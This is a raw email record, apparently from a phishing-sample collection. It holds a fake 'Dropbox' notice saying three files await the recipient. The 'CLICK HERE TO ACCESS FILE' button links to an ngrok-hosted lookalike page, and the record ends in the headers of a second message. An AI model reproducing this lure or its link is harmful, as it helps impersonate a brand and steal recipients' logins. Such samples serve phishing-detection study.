From: "Drop Box " <service@filesafe.com>
Date: Sat, 24 Mar 2018 03:37:32 -0700
Status: O
X-Status: 
X-Keywords:                  
X-UID: 456

You will not see this in a MIME-aware mail reader.
--===============1293276259==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

          =

Dear jose@monkey.org,


You have received 3 files via Dropbox . =

   =

  CLICK HERE TO ACCESS FILE


Your files will expire on 27th March 2018 =



 Thanks

 Dropbox Team
 =


 =20

--===============1293276259==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY>&nbsp;&nbsp;&nbsp; =

<DIV style=3D"BORDER-RIGHT: rgb(240,240,240) 1px solid; BORDER-LEFT: rgb(24=
0,240,240) 1px solid">
<DIV style=3D"BORDER-RIGHT: rgb(220,220,220) 2px solid; BACKGROUND: rgb(244=
,244,244); PADDING-BOTTOM: 24px; PADDING-TOP: 24px; PADDING-LEFT: 32px; BOR=
DER-LEFT: rgb(234,234,234) 1px solid; PADDING-RIGHT: 32px" dir=3Dltr><A cla=
ss=3Dgmail-rg_l style=3D"HEIGHT: 156px; WIDTH: 322px; LEFT: 0px" href=3D"ht=
tps://www.google.com/imgres?imgurl=3Dhttps%3A%2F%2Flogoblink.com%2Fwp-conte=
nt%2Fuploads%2F2013%2F07%2Fdropbox-new-logo-2013.jpg&amp;imgrefurl=3Dhttps%=
3A%2F%2Flogoblink.com%2Fdropbox-with-a-new-logo-2013%2F&amp;docid=3DEt2Mh83=
LRTsXqM&amp;tbnid=3DRqJlpIOjfHTd0M%3A&amp;vet=3D10ahUKEwjmxPDQkYTaAhWBCewKH=
Y8cCQMQMwieASgRMBE..i&amp;w=3D822&amp;h=3D399&amp;client=3Dfirefox-b&amp;bi=
h=3D657&amp;biw=3D1292&amp;q=3Ddropbox%20logo&amp;ved=3D0ahUKEwjmxPDQkYTaAh=
WBCewKHY8cCQMQMwieASgRMBE&amp;iact=3Dmrc&amp;uact=3D8" rel=3Dnoopener>
<DIV class=3Dgmail-Q98I0e></DIV><IMG class=3D"gmail-rg_ic gmail-rg_i" style=
=3D"HEIGHT: 156px; WIDTH: 322px; MARGIN-LEFT: 0px; MARGIN-TOP: 0px; MARGIN-=
RIGHT: 0px" name=3DRqJlpIOjfHTd0M: alt=3D"Image result for dropbox logo" sr=
c=3D"https://encrypted-tbn0.gstatic.com/images?q=3Dtbn:ANd9GcQLGJEqbMZ64bHr=
GNteeI7GZXWqoLk4X2YFhjer52jLdy4pPCnqgw"> =

<DIV class=3Dgmail-rg_ilmbg>&nbsp;</DIV></A>
<DIV style=3D"FONT-SIZE: 14px; COLOR: rgb(43,43,43); LINE-HEIGHT: 9px">
<DIV></DIV></DIV><BR><B>Dear jose@monkey.org,<BR><BR><BR>You have received =
3 files via Dropbox . </B><BR>&nbsp;&nbsp; =

<DIV style=3D"BORDER-RIGHT: rgb(240,240,240) 1px solid; BORDER-LEFT: rgb(24=
0,240,240) 1px solid"><BR></DIV>
<DIV><A style=3D"FONT-SIZE: 11px; TEXT-DECORATION: none; BORDER-TOP: rgb(48=
,121,237) 1px solid; HEIGHT: 29px; FONT-FAMILY: Roboto, Arial, Helvetica, s=
ans-serif; BORDER-RIGHT: rgb(48,121,237) 1px solid; MIN-WIDTH: 54px; BORDER=
-BOTTOM: rgb(48,121,237) 1px solid; FONT-WEIGHT: bold; COLOR: white; OUTLIN=
E-WIDTH: 0px; PADDING-BOTTOM: 0px; TEXT-ALIGN: center; PADDING-TOP: 0px; OU=
TLINE-STYLE: none; PADDING-LEFT: 8px; BORDER-LEFT: rgb(48,121,237) 1px soli=
d; DISPLAY: inline-block; LINE-HEIGHT: 29px; PADDING-RIGHT: 8px; BACKGROUND=
-COLOR: rgb(77,144,254); border-radius: 2px" href=3D"https://f2849bae.ngrok=
.io/dropbox/dropbox/dp/slip/dropbox.html" target=3D_blank>&nbsp;CLICK HERE =
TO ACCESS FILE</A><BR><BR><B><BR>Your files will expire on 27th March 2018 =
</B><BR><BR><BR></DIV>
<DIV><B><SPAN class=3Dgmail-m_-8636059931543515943m_943167227749461526gmail=
-adr>Thanks<BR><BR></SPAN></B></DIV>
<DIV><B><SPAN class=3Dgmail-m_-8636059931543515943m_943167227749461526gmail=
-adr>Dropbox Team<BR></SPAN></B></DIV>
<DIV><B><SPAN class=3Dgmail-m_-8636059931543515943m_943167227749461526gmail=
-adr></SPAN></B><A class=3D"gmail-m_-8636059931543515943m_94316722774946152=
6gmail-url gmail-m_-8636059931543515943m_943167227749461526gmail-fn gmail-m=
_-8636059931543515943m_943167227749461526gmail-n" href=3D"http://www.americ=
ahomecenter.com/" rel=3Dnofollow target=3D_blank><SPAN class=3Dgmail-m_-863=
6059931543515943m_943167227749461526gmail-type></SPAN></A><BR></DIV></DIV><=
/DIV><BR>
<P>&nbsp;</P></BODY></HTML>
--===============1293276259==--

From jose@monkey.org Thu Mar 29 05:24:16 2018 +0000
Return-Path: info@v0.meant4.com
Delivered-To: jose@monkey.org
X-FDA: 73994606112.04.cable95_82de51efc431
X-Spam-Summary: 75,0,0,21bbee951db996a7,d41d8cd98f00b204,info@v0.meant4.com,:,RULES_HIT:2:41:72:152:355:375:379:541:581:962:967:969:973:983:988:989:1147:1189:1208:1224:1260:1261:1263:1311:1313:1314:1345:1381:1394:1431:1437:1513:1515:1516:1517:1521:1535:1560:1588:1589:1593:1594:1623:1686:1714:1730:1747:1777:1792:1801:2198:2199:2393:2525:2527:2543:2557:2560:2563:2610:2682:2685:2693:2731:2859:2890:2892:2894:2896:2899:2915:2924:2926:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3040:3138:3139:3140:3141:3142:3362:3650:3651:3769:3865:3866:3867:3868:3870:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4050:4119:4321:4605:5007:6261:6674:7782:8583:8603:9025:9080:9149:9388:9871:10004:10346:11658:11914:12043:12219:12438:12555:12903:12955:12986:13139:14096:14129:14596:14659:21080:21450:21451:21554:21627:30001:30054:30075,0,RBL:71.251.208.2-irl.urbl.hostedemail.com-127.0.0.175,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral,Cu
X-HE-Tag: cable95_82de51efc431
X-Filterd-Recvd-Size: 8672
Received: from web-server.TopTown.local (static-71-251-208-2.nwrknj.fios.verizon.net [71.251.208.2])
	by imf07.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 29 Mar 2018 05:24:16 +0000 (UTC)
Received: from web-server ([127.0.0.1]) by web-server.TopTown.local with Microsoft SMTPSVC(6.0.3790.4675);
	 Thu, 29 Mar 2018 01:27:15 -0400
Date: Thu, 29 Mar 2018 01:27:15 -0400 (EDT)
